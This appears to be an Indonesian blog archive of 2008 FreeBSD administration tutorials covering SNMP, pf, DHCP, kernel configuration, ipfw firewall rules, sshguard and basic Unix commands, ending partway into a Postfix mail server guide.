# arguments: host [community] [portnum]

informsink 100.10.3.100 berny

# trapcommunity: Default trap sink community to use
# arguments: community-string

trapcommunity berny

# authtrapenable: Should we send traps when authentication failures occur
# arguments: 1 | 2 (1 = yes, 2 = no)

authtrapenable 1

###########################################################################
# SECTION: Monitor Various Aspects of the Running Host
#
# The following check up on various aspects of a host.

# proc: Check for processes that should be running.
# proc NAME [MAX=0] [MIN=0]
#
# NAME: the name of the process to check for. It must match
# exactly (ie, http will not find httpd processes).
# MAX: the maximum number allowed to be running. Defaults to 0.
# MIN: the minimum number to be running. Defaults to 0.
#
# The results are reported in the prTable section of the UCD-SNMP-MIB tree
# Special Case: When the min and max numbers are both 0, it assumes
# you want a max of infinity and a min of 1.

proc squid

# disk: Check for disk space usage of a partition.
# The agent can check the amount of available disk space, and make
# sure it is above a set limit.
#
# disk PATH [MIN=100000]
#
# PATH: mount path to the disk in question.
# MIN: Disks with space below this value will have the Mib's errorFlag set.
# Can be a raw byte value or a percentage followed by the %
# symbol. Default value = 100000.
#
# The results are reported in the dskTable section of the UCD-SNMP-MIB tree

disk /data 100000

# load: Check for unreasonable load average values.
# Watch the load average levels on the machine.
#
# load [1MAX=12.0] [5MAX=12.0] [15MAX=12.0]
#
# 1MAX: If the 1 minute load average is above this limit at query
# time, the errorFlag will be set.
# 5MAX: Similar, but for 5 min average.
# 15MAX: Similar, but for 15 min average.
#
# The results are reported in the laTable section of the UCD-SNMP-MIB tree

load 1 5 15

# file: Check on the size of a file.
# Display a files size statistics.
# If it grows to be too large, report an error about it.
#
# file /path/to/file [maxsize_in_bytes]
#
# if maxsize is not specified, assume only size reporting is needed.
#
# The results are reported in the fileTable section of the UCD-SNMP-MIB tree

file /usr/local/squid/var/log/access.log 1048576

Cara konfigurasi packet filter di Freebsd

2008-12-22T13:15:00.000+07:00

Untuk konfigurasi Pfctl di FreeBSD secara sederhana sudah disediakan. File-file contoh tersebut diletakan di direktori example >> /usr/share/example/pf/. contoh-contoh file tersebut berisi contoh konfigurasi untuk masing-masing jenis kebutuhan standar minimal untuk pengaturan akses jaringan komputer dengan server freebsd menggunakan packet filter (pf).

ll /usr/share/examples/pf/
total 24
-r--r--r-- 1 root wheel 1363 Jan 12 14:40 ackpri
-r--r--r-- 1 root wheel 1201 Jan 12 14:40 faq-example1
-r--r--r-- 1 root wheel 3255 Jan 12 14:40 faq-example2
-r--r--r-- 1 root wheel 4691 Jan 12 14:40 faq-example3
-r--r--r-- 1 root wheel 985 Jan 12 14:40 queue1
-r--r--r-- 1 root wheel 1206 Jan 12 14:40 queue2
-r--r--r-- 1 root wheel 593 Jan 12 14:40 queue3
-r--r--r-- 1 root wheel 980 Jan 12 14:40 queue4
-r--r--r-- 1 root wheel 338 Jan 12 14:40 spamd

Dengan contoh konfigurasi minimal ini, maka koneksi ke jaringan sudah dapat berjalan.
tinggal terserah kita contoh konfigurasi yang mana akan kita gunakan.
Direktori example ( /usr/share/example ) sendiri menyediakan beberapa contoh konfigurasi lainnya selain packet filter (pf), seperti packet filter kita hanya perlu memodifikasi sedikit sesuai dengan konfigurasi sistem kita maka file-file contoh tersebut dapat kita gunakan di sistem operasi FreeBSD kita.

ll /usr/share/examples/
total 76
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 BSD_daemon
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 FreeBSD_version
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 IPv6
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 atm
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 bc
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 bootforth
drwxr-xr-x 3 root wheel 512 Apr 19 07:05 cvs
drwxr-xr-x 2 root wheel 512 Apr 21 05:16 cvsup
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 dialog
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 diskless
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 drivers
drwxr-xr-x 3 root wheel 1536 Apr 19 07:05 etc
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 find_interface
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 ibcs2
drwxr-xr-x 2 root wheel 1024 Apr 19 07:05 ipfilter
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 ipfw
drwxr-xr-x 5 root wheel 512 Apr 19 07:05 isdn
drwxr-xr-x 5 root wheel 512 Apr 19 07:05 kld
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 libdialog
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 libvgl
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 mdoc
drwxr-xr-x 3 root wheel 512 Apr 19 07:05 netgraph
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 nwclient
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 perfmon
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 pf
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 portal
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 ppi
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 ppp
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 pppd
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 printing
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 scsi_target
drwxr-xr-x 7 root wheel 512 Apr 19 07:05 ses
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 slattach
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 sliplogin
drwxr-xr-x 3 root wheel 512 Apr 19 07:05 smbfs
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 startslip
drwxr-xr-x 5 root wheel 512 Apr 19 07:05 sunrpc
drwxr-xr-x 2 root wheel 512 Apr 19 07:05 tcsh

Konfigurasi DHCP pada server freeBSD

2008-12-22T13:12:00.000+07:00

DHCP merupakan protokol yang digunakan oleh komputer-komputer dalam sebuah jaringan untuk menentukan parameter seperti default gateway, subnet mask, dan IP address, DNS dari DHCP server. Fungsi umum DHCP server adalah untuk mempermudah pengalokasian IP address (selanjutnya disebut IP) dan juga pengaturan IP yang sangat dinamis untuk membantu memudahkan user agar tidak perlu mensetting IP ketika ada penambahan user baru atau setelah format ulang sebuah PC. Informasi lengkap mengenai DHCP silahkan baca di http://en.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol#Introduction.

Setelah anda memahami fungsi dan cara kerja DHCP Server, marilah kita mencoba untuk menginstall sebuah DHCP Server.

Pertama yang harus dilakukan adalah login sebagai root pada server Anda, lalu masuk ke directory ports dhcp server

indofreebsd# cd /usr/ports/net/isc-dhcp3-server/
indofreebsd# make install

Setelah selesai installasi lakukan konfigurasi pada dhcp server tersebut.

Jika belum ada aplikasi dhcp-server, dapat melakukan langkah berikut :

Langkah-langkah berikut bisa dipakai untuk installasi dhcpd dari source-nya.

#wget http://ftp.isc.org/isc/dhcp/dhcp-3.0.6.tar.gz
#tar -zxvf dhcp-3.0.6.tar.gz
#cd dhcp-3.0.6
#./configure
#make
#make install

indofreebsd# pico /usr/local/etc/dhcpd.conf

contoh isi dhcpd.conf-nya

#—-mulai—–#

ddns-update-style none;

subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.1 192.168.1.100;
option routers 192.168.1.254;
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.1.254;
option domain-name “http://mu2jotex.co.cc”;

default-lease-time 3600;
max-lease-time 86400;
}

#—selesai—-#

Simpan setelah selesai mengedit file konfigurasi di atas.

Lakukan konfigurasi pada rc.conf untuk menentukan jalannya DHCP server dan listen di interface mana DHCP server tersebut.

indofreebsd# ee /etc/rc.conf

tambahkan:

# —-mulai—-#

dhcpdenable=”YES”
dhcpdflags=”-q”
dhcpdconf=”/usr/local/etc/dhcpd.conf”
dhcpdwithumask=”022″
dhcpdwithgroup=”dhcpd”
dhcpd_ifaces=”rl1”

#—-selesai—#

kemudian simpan perubahan.

Jalankan DHCP server

indofreebsd# /usr/local/etc/rc.d/isc-dhcpd start

Starting dhcpd.

Sampai tahap ini selesai sudah proses menginstall dan menjalankan DHCP server. Untuk feature-feature lain silakan bereksprimen sendiri.

Sekarang kita coba DHCP server baru dengan mensetting obtain IP adress automatically pada PC windows atau menjalankan dhcpclient pada PC freebsd. Perhatikan aktivitas DHCP server lease tersebut dengan cara:

indofreebsd# tail -f /var/db/dhcpd.leases
lease 192.168.1.1 {
starts 2 2007/01/30 23:25:05;
ends 3 2007/01/31 00:25:05;
tstp 3 2007/01/31 00:25:05;
binding state active;
next binding state free;
hardware ethernet 00:01:6c:b0:d0:44;
uid “\001\000\001l\260\320D”;
client-hostname “underiez”;
}

Konfigurasi dan Optimasi Kernel pada FreeBSD (Lanjutan)

2008-12-22T13:06:00.001+07:00

Yang perlu saya konfigurasi adalah membuat kernel agar support PF (PF miliknya OpenBSD nech :p trus support ALTQ CBQ trus untuk optimasi SQUID supaya bisa dukung diskd dan meng-unload konfigurasi-konfigurasi yang tidak saya gunakan pada kernel seperti dukungan terhadapa Slot ISA, RAID dan SCSI, USB, Wireless de eL eL -lah.

Untuk mengkonfigurasi kernel FreeBSD silahkan lakukan langkah-langkah berikut ini :

# cd /usr/src/sys/i386/conf
# cp GENERIC ROUTER
# ee ROUTER

Sebenarnya cara konfigurasi kernel ini dapat dilihat pada ebook-nya om 1smail pada tulisan saya terdahulu. Disini saya hanya menambahkan beberapa parameter untuk mengaktifkan fiture-fiture yang akan saya gunakan seperti yang saya sebutkan sebelumnya diatas .

kembali ke ee ROUTER pada bagian-bagian seperti

machine i386
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
ident Router
…
#options MSDOSFS
…
#options SCSI_DELAY=5000
…
# SCSI Controllers — commend semunya untuk menonaktifkan dukungan
#device ahb
#device ahc
#device ahd
#device amd
#device isp
#device ispfw
#device mpt
#device ncr
#device sym
#device trm
#device adv
#device adw
#device aha
#device aic
#device bt
#device ncv
#device nsp
#device stg
# SCSI peripherals
#device scbus
#device ch
#device da
#device sa
#device cd
#device pass
#device ses
…
# RAID controllers interfaced to the SCSI subsystem
#device amr
#device arcmsr
#device asr
#device ciss
#device dpt
#device hptmv
#device rr232x
#device iir
#device ips
#device mly
#device twa
# RAID controllers
#device aac
#device aacp
#device ida
#device mfi
#device mlx
#device pst
#device twe
…
# PCCARD (PCMCIA) support
# PCMCIA and cardbus bridge support
#device cbb
#device pccard
#device cardbus
…
## cape nilisnya selanjutnya perkategori aza yach ati-ati salah oke !
# ISA Ethernet NICs –> comment semua dibawahnya
# Wireless NIC cards –> comment semua dibawahnya
#USB Support –> comment semua dibawahnya
# FireWire support –> comment semua dibawahnya

Apa yang saya lakukan diatas adalah untuk menonaktifkan dukungan hardware terhadap perangkat-pernangkat yang tidak saya gunakan… ini berguna untuk meng-efisiensikan kernel terhadap sistem saya nantinya… dan yang paling penting adalah saya menambahkan ini pada bagian akhir konfigurasi file ROUTER untuk mengaktifkan beberapa parameter :

###—untuk support PF—-###
device pf
device pflog
device pfsync
###—untuk support altq cbq—###
options ALTQ
options ALTQ_CBQ
options ALTQ_RED
options ALTQ_RIO
options ALTQ_HFSC
options ALTQ_PRIQ
options ALTQ_NOPCC
###—untuk optimasi squid untuk dukungan diskd—###
options SYSVMSG
options MSGMNB=32768
options MSGMNI=164
options MSGSEG=8196
options MSGSSZ=512
options MSGTQL=2048
###—optional—###
device carp
options HZ=1000

Setelah selesai save dan keluar dari editor dengan menekan [Esc] dan [Enter] 2x !

Selanjitnya tinggal meng-compile kernel yang baru saya dikonfigurasi :

# config ROUTER
# cd .. ../compile/ROUTER
# make cleandepend
# make depend
# make all
# make install

Selanjutnya tinggal di reboot dech…

Langkah - langkah Menginstall FreeBSD

2008-12-22T13:01:00.000+07:00

Langkah Instalasi FreeBSD 4

–Panduan Singkat

Tulisan ini merupakan sebuah prosedur ringkas cara menginstalasi FreeBSD. Tetapi disini ditambahkan fungsi portupgrade -ai (mengganti semua port, dengan konfirmasi), yang memerlukan beberapa konfigurasi lokal dalam file pkgtools.conf. Tujuan uraian ini adalah memakai cvsup.sh && build-world-kernel.sh, dan terbangunnnya sistem yang dapat memberitahu anda apa yang harus dikerjakan kemudian agar instalasi lengkap dengan sedikit usaha. Bagi pemula, sebaiknya pada waktu praktek mengikuti langkah langkah berikut didampingi rekan yang telah terbiasa dengan instalasi FreeBSD. Penjelasan tentang perintah dalam FreeBSD silahkan lihat FreeBSD Handbook. Setelah anda sukses melakukan instalasi FreeBSD, gantilah kernel anda, dan instalasi beberapa port-nya.

Anda perlu perhatikan perintah instant-server dan instant-workstation meta-ports, yang menyatukan layanan yang diperlukan dan aplikasi dekstop. Terutama jika anda mengetik

cd /usr/ports/misc/instant-workstation && make

sistem anda akan menginstalasi berbagai macam software yang bermanfaat secara otomatis.

Dalam uraian ini tidak dijelaskan bagaimana mengubah script yang ada, anda mungkin harus memutuskan mengedit script dalam sistem anda nantinya dan disesuaikan dengan data teknis jaringan komputer anda. Pengeditan script bisa dilakukan dengan mengetik perintah vi namafilenya, setelah muncul filenya barulah anda edit atau isi dengan data teknis jaringan anda seperti nama host, IP address, netmask dll.

Catatan: Perintah $myself dan $hostname, yang dipakai dibawah ini tidak ditujukan sebagai variabel shell sebenarnya. Ketika anda melihat mereka, langsung masukan saja data yang sesuai dengan jaringan komputer anda. Postfix akan memakai variable yang ada didalam file main.cf, ingat – nama variabel dalam posfix (tidak ditulis italic) dan dapat diakses langsung, jadi Postfix dapat melakukan substitusi variabel secara sendiri.

Catatan: File file yang dipakai dalam prosedur ini ditujukan untuk pemakaian umum, dan meliputi berbagai saran. Namun ini belum tentu sesuai atau optimal bagi kebutuhan sistem anda. Akan tetapi cara berikut ini dapat merupakan awal yang baik bagi instalasi sistem anda. Disarankan untuk mendownload file resource bari uraian ini dari http://www.reppep.com/~pepper/freebsd/install/reppep.tgz, kemudian lihat dan sesuaikan dengan kebutuhan anda lalu copikan ke direktori /root/reppep untuk melanjutkan prosedur berikut nya.

Tip: Reboot after finishing each main heading, to make sure you haven’t broken anything too badly. If you break something and don’t notice quickly, fixing the problem gets much harder.

–>

Dasar Instalasi (`sysinstall`)

Instalasi semua file distribusinya (”Semua source sistem, binari dan sistem X Window”).
Instalasi koleksi port.
Konfigurasi network.
Tambahkan :
- bash
- cvsup
- ispell
- kde
- mozilla-gtk
- portupgrade
- rsync
- samba
- screen
- sudo
Catatan: Jika anda ingin setiap user mempunyai group personal-nya (seperti yang ada pada Linux & Panther), buatlah group group baru pertama kali pada saat melakukan sysinstall. pastikan setiap langkah pembuatan account user, tiap user mempunyai group 0 (wheel) member– sebab dengan cara su akan mengalami kurang cocok.

Setup Dasar dan Account

Serial console dibuat enable dengan mengetikan : echo "-hD" > /boot.config tekan enter.
Bila anda tidak melakukan itu pada terminal serial didalam sysinstall, lakukan sekarang dengan cara mengetikan : echo 'ttyd0 "/usr/libexec/getty std.9600" dialup on secure' >> /etc/ttys lalu tekan enter.
Ketikan: visudo # uncomment full access for %wheel lalu tekan enter.
Ketikan: cd /root && ftp http://www.reppep.com/~pepper/freebsd/install/reppep.tgz && tar xzf reppep.tgz && ls -lt reppep kemudian anda tekan tombol enter, ambilah file file tambahan yang disarankan berikut patch-nya, dan bukalah pada untuk direktori /root/reppep — bila anda punya patch local, buka jugalah file file itu untuk patch lokal anda.
Jika anda punya pacth lokal, bukalah file file itu dengan cara mengetikan. tar xzf local.tgz && ls -lt reppep tekan enter.
Ketikan: patch /etc/ssh/sshd_config /root/reppep/sshd_config.diff tekan enter.
Instalasilah file kernel anda dan tetapkan konfigurasinya dalam direktori /usr/src/sys/i386/conf.
Ketikan: cd /etc && cp /root/reppep/make.conf . && cat /root/reppep/rc.conf* >> rc.conf && vi resolv.conf rc.conf make.conf && egrep -v ‘(^$|^#)’ rc.conf | sort | more # tuliskan semua konfigurasi jaringan komputer anda pada file rc.conf.local; pastikan tidak ada variabel yang anda tuliskan dua kali didalam file rc.conf.
Ketikan: mkdir -p /home/ports/distfiles && cd /usr/ports && rmdir distfiles && ln -s /home/ports/distfiles # preserves ports across rebuilds
Ketikan: mkdir -p /usr/sup && cp /root/reppep/cvsupfile /root/reppep/periodic.conf /root/reppep/ntp.conf /etc && cp /root/reppep/refuse /usr/sup && vi /etc/cvsupfile /etc/ntp.conf /usr/sup/refuse
Ketikan: mkdir -p ~root/bin ~root/log
Ketikan: cd /root/reppep && cp build-world-kernel.sh cvsup.sh /root/bin && chmod u+x /root/bin/*.sh && rehash
Ketikan: patch /usr/local/etc/pkgtools.conf /root/reppep/pkgtools.conf.diff

Mengubah Source, Kernel dan World (dengan tipe terbaru, lakukan secara periodik)

Catatan: Rekomendasi dari FreeBSD ada di http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/makeworld.html, walau agak susah tetapi secara teori cukup aman. Jika anda masih kurang jelas dg apa yang anda lakukan disini ataupun dengan mengikuti langkah dari situs tadi, bacalah prosedur yang tertulis didalam Handbook FreeBSD.

Peringatan: Langkah ini muda merusak sistem anda, atau mengunci anda sendiri, ketika melakukan perubahan kernel atau world. pastikan anda memiliki akses console (PS/2-style atau serial) sebelum melakukan perubahan.

cvsup.sh # mengubah dasar FreeBSD yaitu source (kernel & world), dan pohon port; tidak akan berpengaruh terhadap port yang telah terinstall
cd /usr/src && mergemaster -p # mergemaster akan membutuhkan banyak waktu, sehinga akan lebih b aik melakukannya sebelum sistem down.
build-world-kernel.sh
make installkernel
shutdown -r now
Pembuatan kernel baru.
shutdown now # single-user
cd /usr/src && make installworld
mergemaster
shutdown -r now
Editlah tiap file konfigurasi tambahan ang ada dalam direktori /etc or /usr/local/etc.
Ujilah sambungan komputer anda ke jaringan dan firewal-nya (mungkin memakai perintah ipfw list).

Catatan: Jika anda memakai bagian ini sebagai panduan dalam pengubahan sistem yang sedang beroperasi, dan bukan sistem yang baru anda buat, jangan lupa lakukan perintah portupgrade -ai pada saat kernel & world yang baru anda buat sudah selesai dikerjakan..

Mengkonfigurasi BIND

cd /etc/namedb && sh make-localhost && mv named.root named.root.old && dig @m.root-servers.net. ns . > named.root && vi named.conf && grep named /etc/rc.conf # konfigurasikan domain promer dan domain slave & instalasilah file file zona; bisa dilihat dengan menyetel opsi named_enable="YES"
Catatan: Konfigurasi BIND disini dioperasikan sebagai root tanpa partisi pengamanan khusus. Situs http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/network-dns.html memberikan instruksi untuk menjalankan BIND dalam sebuah kondisi chroot, dan BIND mungkin juga dioperasikan dalam kondisi jail. Kedua opsi tersebut cukup melindungi BIND dari serangan, dan bisa anda pertimbangkan, tetapi tidak akan dijelaskan dalam uraian ini.

Instalasi Port

cd /usr/ports/lang/perl5.8 && make install && rehash && use.perl port && perl --version
portupgrade -a && portversion |grep -v = # mencoba mengubah apa saja.
portinstall analog cronolog curl docproj-nojadetex htmldoc lsof lynx-ssl minicom netatalk nmap nut procmail webmin apache2 squirrelmail p5-Mail-SpamAssassin drac imap-uw postfix && rehash # customized or perl-based
cd /usr/local/etc && cp smb.conf.default smb.conf && vi smb.conf # disini pasword enkripsi diset enable, lalu melakukan disable terhadap local master, dan disable printer; Disini juga dituliskan pembatasan akses dari IP seperti yang dituliskan dalam firewall yang ada dalam file smb.conf, sehingga semua program terkontrol melalui file yang sama.
echo "- -noddp -passwdminlen 6 -loginmaxfail 6 -uamlist uams_dhx.so" >> /usr/local/etc/afpd.conf
cd /usr/local/etc/rc.d && patch netatalk.sh /root/reppep/netatalk.sh.diff # disable atalk, pap, & nbp
mkdir -p /var/log/samba && cd /usr/local/etc/rc.d && cp netatalk.sh.sample netatalk.sh && cp samba.sh.sample samba.sh
Konfigurasikan XFree86 (disini tidak akan dijelaskan lebih rinci) lihatlah situs http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/x-config.html.
Sekali XFree86 bekerja, pasti anda ingin menginstalasi KDE secara otomatis pada saat boot, coba lakukan perintah berikut : echo 'ttyv9 "/usr/local/bin/kdm" xterm on secure' >> /etc/ttys, or use KDE with startx: echo exec startkde > ~/.xinitrc

Mengkonfigurasi Mail

cd /etc/mail && mv mailer.conf mailer.conf.sendmail && cp /root/reppep/mailer.conf .
cd /usr/local/etc && cp /root/reppep/procmailrc . && vi procmailrc
patch /etc/inetd.conf /root/reppep/inetd.conf.diff && patch /etc/pam.conf /root/reppep/pam.conf.diff # for imap-uw
vi /usr/local/etc/mail/spamassassin/local.cf # customize SpamAssassin
echo localhost > /usr/local/etc/dracd.host && /usr/local/etc/rc.d/dracd.sh start
vi /etc/aliases && newaliases # forward for $myself & root
Jika memakai Postfix Virtual Host, editlah dengan cara ketikan: vi /etc/mail/virtual && postmap /etc/mail/virtual
cd /usr/local/etc/postfix && cat /root/reppep/main.cf.* >> main.cf && vi + /usr/local/etc/postfix/main.cf && postfix stop ; killall sendmail ; postfix check && postfix start && sleep 1 && tail /var/log/maillog
cd /usr/ports/mail/imap-uw && make cert && chmod -x /usr/local/certs/imapd.pem # follow prompts
Bila diinginkan port terpasang lakukan: portinstall -f mysql-server # -f to get around the hold in pkgtools.conf

Mengkonfigurasi Apache & SquirrelMail

mkdir -p /var/log/httpd /home/httpd && mv /usr/local/www/data /home/httpd/htdocs && mv /usr/local/www/cgi-bin /home/httpd && cd /usr/local/etc/apache2 && patch httpd.conf /root/reppep/httpd.conf.diff && touch vhost.conf
Either apply a local patch (patch httpd.conf /root/reppep/httpd.conf.diff.local), or vi httpd.conf (set ServerAdmin & ServerName dan lihatlah securitynya)
apachectl configtest && apachectl graceful
mkdir -p ssl.crt ssl.key && cp /usr/local/certs/imapd.pem ssl.key/server.key && cp /usr/local/certs/imapd.pem ssl.crt/server.crt && vi ssl.???/* vhost.conf && apachectl stop && apachectl configtest && apachectl startssl && apachectl fullstatus # remove cert from server.key & key from server.crt
cp /usr/local/etc/php.ini-recommended /usr/local/etc/php.ini
cd /usr/local/www/squirrelmail && ./configure
Test https://$hostname/mail/.
Menguji Squirell Mail (dg cara mengunencryp IMAP ke localhost) & telnet $hostname imap akan gagal, jika diblok oleh firewall.
Tambahkan plugin tambahan yang anda inginkan untuk SquirrelMail .

webmin

cd /usr/local/lib/webmin/ && ./setup.sh
Visit https://$hostname:10000/
Konfogurasi Webmin: IP Access Control: aturlah “Only allow from listed addresses” to 127.0.0.1 & trusted IPs.
User Webmin: Buanglah semua modul yang tidak diperlukan.
Bila mysql-server terinstalasi didalam server anda, Konfigurasi webmin dilakukan dibawah: Servers.
/usr/local/etc/rc.d/webmin.sh-dist stop # pakailah argumen start nanti, untuk mengoperasikan webmin bila diperlukan.

Cara Konfigurasi Firewall di FreeBSD Memakai IPFW

2008-12-22T12:58:00.001+07:00

1. Konfigurasi Kernel

Ada beberapa opsi konfigurasi yang harus ditambahkan pada kernel agar ipfw dapat digunakan, Opsi yang akan di tambahkan pada file kernel antara lain :

options IPFIREWALL #firewall
options IPFIREWALL_VERBOSE #informasi firewallnya
options IPFILTER #dukungan untuk ipfilter
options IPFILTER_LOG #log ipfilter
#options IPFIREWALL_DEFAULT_TO_ACCEPT

Jika anda menginginkan default firewall menjadi terbuka, tambahkan saja opsi tersebut.

2. Kompilasi kernel

# cd /usr/src/sys/i386/conf; config CONFIG_KERNEL_
# cd ../../compile/CONFIG_KERNEL
# make depend; make

3. Instalasi Kernel

Jika proses diatas selesai tanpa ‘error’ maka perintah terakhir

#make install
#init 6

4. Menggunakan ipfw untuk membuat ACL (access control list)
Secara dasar aturan untuk ipfw sebagai berikut :

ipfw action number [allow|deny] [all|tcp|udp|ip] darimana kemana via apa

Ubah user menjadi root, contoh nya :

#su

Membolehkan localhost untuk berkomunikasi dengan dirinya sendiri :

/sbin/ipfw add 100 pass all from any to any via lo0
/sbin/ipfw add 200 deny all from any to 127.0.0.0/8

Membolehkan localhost untuk berkomunikasi ke siapa saja melalui ethernet

/sbin/ipfw add 300 allow all from IP_ANDA to any

Membolehkan koneksi normal yang sudah terhubung dengan baik

/sbin/ipfw add 350 allow tcp from any to any established

Jika anda menjalankan webserver dan mailserver, anda memerlukan port 80 dan 25 agar dapat

di akses oleh host yang lain.

/sbin/ipfw add 400 allow tcp from any to any 80
/sbin/ipfw add 500 allow tcp from any to any 25

Membolehkan data tipe udp untuk dikirimkan dari nameserver sebagai fungsi DNS :

/sbin/ipfw add 600 allow udp from DNS_SERVER 53 to IP_ANDA

Membolehkan seluruh ICMP kecuali ping :

/sbin/ipfw add 700 deny icmp from any to YOUR_IP_HERE icmptypes 8
/sbin/ipfw add 800 allow icmp from any to any

Jika anda ingin host berjalan dengan tipe firewall terbuka, tambahkan di file /etc/rc.conf

firewall_enable=”YES”
firewall_type=”OPEN”

Cara NgeBlock SSH brute force di FreeBSD

2008-12-22T12:55:00.001+07:00

I hate ssh bruteforce !!! here i explain to you how to block bruteforce in your ssh port.
#cd /usr/ports/security/sshguard
#make fetch extract
#cd work/sshguard-1.0/src
# ee sshguard.c

change line 153-157 :
###
if (fw_fin() != FWALL_OK) sshguard_log(LOG_ERR, “Cound not
finalize firewall.”);

sshguard_log_fin();

return 0;
###

#####
exit(0);
######

now lets install it.
#make install clean
# ee /etc/syslog.conf
find this line
#auth.info;authpriv.info |exec /usr/local/sbin/sshguard

uncomment that line.Then restart syslogd
#/etc/rc.d/syslogd restart

Perintah Dasar FreeBSD

2008-12-22T12:47:00.000+07:00

Bagi yang masih pemula, pasti bingung untuk mejalankan FreeBSD pada waktu setelah di innstall. Disini saya akan memberikan perintah dasar FreeBSD sebagai dasar untuk mengoperasikan FreeBSD.

Setelah anda menginstall FreeBSD dan menjalankan FreeBSD, yang akan muncul adalah permintaan login dari mesin. Login yang biasa pertama kali dipakai itu adalah login dengan user : root. Dan passwordnya adalah sesuai dengan yang anda masukkan pada waktu penginstallan. Jika anda mempunyai user/account yang baru anda buat maka anda dapat masuk ke mesin itu lewat account tersebut.

Setelah itu anda dapat mengoperasikan mesin FreeBSD anda dengan perintah-perintah berikut:

‘cd’ = change directory (pindah ke directory …)

‘ls’ = list (me-list semua directory dan file yang ada disuatu directory)

‘rm’ = remove (menghapus suatu file)

‘mkdir’ = make directory (membuat directory/folder)

‘clear’ = menghapus semua layar dari perintah-perintah yang pernah kita buat

‘ps’ = processing status (melihat proses yang sedang bekerja di mesin)

‘kill’ = menghentikan suatu proses

‘cp’ = copy (untuk mengcopy suatu file)

‘whoami’ = untuk mengetahui sebagai apa kita menjalan mesin tersebut

‘pwd’ = untuk mengetahui kalo kita sedang berada di directory …

‘tar’ = untuk mengekstrak file compress (file nya harus bertipe .tar.gz)

‘compress’ = untuk mengkompress suatu file atau directory

‘whereis’ = untuk mengetahui terletak di directory mana suatu file itu berada

‘mv’ = memindahkan suatu file ke directory lain atau merubah nama suatu file

‘passwd’ = untuk merubah password account yang sedang dipakai

‘ee’ = easy editor (suatu program editor text seperti notepad jika di Windows)

Lainnya :

Selain perintah yang bersifat built-in bagi shell, UNIX menyediakan banyak utilitas yang sangat bermanfaat bagi pemakai. Pada bagian ini, beberapa perintah UNIX (built-in maupun utilitas) akan diperkenalkan. Beberapa di antaranya hanya berupa suatu ringkasan.
Tabel Perintah lingkungan sistem
Perintah Keterangan
Exit Keluar dari shell pada Bourne shell dan Korn shell.
Id Menampilkan nama pemakai beserta nomor identitas dari pemakai serta nama group dan nomor identitas group.
logname Menampilkan nama pemakai.
Logout Keluar dari shell pada C shell.
Man Menampilkan dokumentasi online dari suatu perintah UNIX.
newgrp Mengubah group efektif.
passwd Memberikan password atau mengubah password
Set Menampilkan variabel lingkungan pada shell pemakai.
Tty Menampilkan nama identitas (port) terminal.
Uname Menampilkan nama simpul dari sistem UNIX
Who Menampilkan pemakai yang sedang menggunakan sistem.

Tabel Perintah manajemen file
Perintah Keterangan
Cat Menampilkan isi file.
Cp Menyalin satu atau beberapa file.
Find Mencari file-file tertentu pada suatu direktori.
Ls Menampilkan informasi dari file.
More Menampilkan isi suatu file teks per layar.
Mv Memindahkan suatu file ke direktori lain atau mengubah nama file.
Pg Menampilkan isi suatu file teks per layar.
Rm Menghapus file.

Tabel Perintah manajemen direktori
Perintah Keterangan
Cd Mengaktifkan suatu direktori sebagai direktori kerja.
Copy Menyalin seluruh struktur direktori (termasuk file dan subdirektori).
Mkdir Membuat direktori baru.
Pwd Menampilkan nama direktori kerja.
Rmdir Menghapus direktori.
Mv Mengubah nama direktori.

Tabel Perintah untuk mengatur akses file
Perintah Keterangan
Chgrp Mengubah group dari suatu file atau direktori.
Chmod Mengubah permisi dari suatu file atau direktori.
Chown Mengubah pemilik dari suatu file atau direktori.

Tabel Perintah yang berhubungan dengan proses
Perintah Keterangan
Kill Menghentikan suatu proses berdasarkan identitas proses.
Ps Menampilkan proses-proses yang sedang berjalan.
Sleep Menunda eksekusi (Proses yang tidak mengerjakan apa-apa selama beberapa detik).

Tabel Perintah yang berhubungan dengan layar
Perintah Keterangan
Banner Menampilkan tulisan berukuran besar
Clear Menghapus layar
Echo Menampilkan tulisan ke layar

Tabel Perintah lain-lain
Perintah Keterangan
Bc Utilitas untuk mengatur perhitungan.
Cal Menampilkan kalender.
Date Menampilkan tanggal dan jam sistem.
Grep Mencari file-file yang mengandung kat tertentu.
Lp Mencetak file ke printer.
Mail Utilitas untuk menyampaikan pesan tertulis ke pemakai lain.
Sort Mengurutkan kata.
Vi Editor teks.
Wc Menghitung jumlah karakter, kata dan baris suatu file.

Semoga Bermanfaat !!!!!!!!!!!!!!!!!

Membuat Mail Server "Sederhana" di Linux

2008-12-22T03:56:00.001+07:00

File yang dibutuhkan antara lain :

* Arch Linux
* Postfix 2.1.5
Secure, fast, easy to administer drop in replacement for Sendmail.
(MTA) Provides smtp-server.
(Requires sasl installed and support for sasl compiled into Postfix if
